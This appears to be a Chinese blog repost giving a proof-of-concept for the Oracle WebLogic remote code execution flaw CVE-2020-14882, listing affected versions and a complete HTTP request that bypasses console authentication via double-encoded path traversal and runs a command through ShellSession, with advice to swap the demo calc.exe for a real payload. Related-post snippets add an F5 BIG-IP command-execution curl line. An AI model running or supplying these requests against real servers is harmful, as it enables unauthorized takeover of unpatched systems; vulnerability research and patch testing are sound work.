2. 程式人生 > 實用技巧 >2020 weblogin rce CVE-2020-14882 漏洞利用POC

2020 weblogin rce CVE-2020-14882 漏洞利用POC

阿新 發佈:2020-10-29

漏洞來源

根據P牛圈子告知,應該是長亭某研究員上報“voidfyoo”。
細節由國外人員披露

漏洞詳情

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
以上鍊接需要科-學-上網

影響版本

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

poc

GET/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);HTTP/1.1
Host:192.168.3.189:7001
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:81.0)Gecko/20100101Firefox/81.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Connection:close
Cookie:ADM
Upgrade-Insecure-Requests:1

更改calc.exe 變成exp

相關推薦

2020 weblogin rce CVE-2020-14882 漏洞利用POC

漏洞來源 根據P牛圈子告知,應該是長亭某研究員上報“voidfyoo”。 細節由國外人員披露

Citrix Systems產品安全漏洞 CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 poc

Citrix 簡介 Citrix Systems Citrix Application Delivery Controller(ADC)等都是美國思傑系統(Citrix Systems)公司的產品。Citrix Application Delivery Controller是一款應用交付控制器。Citrix Systems Gatew

F5 BIG-IP 遠端程式碼執行RCE(CVE-2020-5902)復現

漏洞簡介 F5 BIG-IP 是美國``F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-1938與CVE-2020-13935漏洞復現

前言 最近在騰訊雲上買了個伺服器,準備用來學習。在安裝了7.0.76的tomcat後,騰訊雲提醒我存在兩個漏洞,分別是CVE-2020-1938和CVE-2020-13935,在修復完漏洞後,準備復現一下這兩個漏洞,於是就有了這篇隨筆。

CVE 2017-0199漏洞利用的新姿勢

近日從客戶處捕獲一枚郵件附件中的可疑word樣本,以下是掃描結果,檢測率貌似不高。

CVE-2017-5123 漏洞利用全攻略

原文:https://salls.github.io/Linux-Kernel-CVE-2017-5123/ 譯者:hello1900@知道創宇404實驗室

iPhone的Wi-Fi晶片漏洞利用POC公佈,趕緊更新系統吧

本週,谷歌 Project Zero 專案的研究員 Gal Beniamini 公佈了 iPhone Wi-Fi 韌體的漏洞利用 POC。這個漏洞CVE-2017-11120)是個記憶體損壞(memory corruption)漏洞,存在於 iPhone 和其他蘋果產品(Android 手機

CVE-2020-5902 f5-big-ip Read File&RCE利用方式

介紹: F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-15148 Yii框架反序列化RCE利用鏈 exp

簡介 如果在使用yii框架,並且在使用者可以控制的輸入處呼叫了unserialize()並允許特殊字元的情況下,會受到反序列化遠端命令命令執行漏洞攻擊。

Weblogic未授權遠端命令執行漏洞CVE-2020-14882&CVE-2020-14883)復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

weblogic 未授權命令執行漏洞CVE-2020-14882,CVE-2020-14883)復現

漏洞描述 2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ,漏洞等級:嚴重,漏洞評分:9.8。遠端攻擊者可以構造特殊的HTTP請求,在未經身

CVE-2020-14882​&14883:Weblogic RCE復現

0x01 簡介 Weblogic是美國Oracle公司出品的一個Application Server,確切的說是一個基於JavaEE架構的中介軟體,Weblogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。

Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496)復現

Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496)復現 簡介 Apache OFBiz全稱是The ApacheOpen For Business Project,是開一個放的電子商務平臺,也是一個非常著名的開源專案

CVE-2020-14882 weblogic 未授權訪問漏洞

(1)許可權繞過漏洞CVE-2020-14882),因為CVE-2020-14882未授權訪問漏洞是繞過管理控制檯許可權訪問後臺,所以需要存在console控制檯,訪問:ip:port/console

Apache Dubbo Provider預設反序列漏洞復現(CVE-2020-1948)

Apache Dubbo Provider預設反序列漏洞CVE-2020-1948) 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行RCE

cve-2020-5902 : RCE:curl -v -k \'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\'

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

F5 BIG-IP 遠端程式碼執行漏洞復現(CVE-2020-5902)

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-0674 IE遠端程式碼執行漏洞

0x00 漏洞描述 該漏洞影響元件為jscript.dll,該動態連結庫是微軟Internet Explorer瀏覽器的Javascript引擎之一,其中IE8及以下使用jscript.dll,IE9及以上預設使用jscript9.dll,但網頁可以通過《script》標籤指定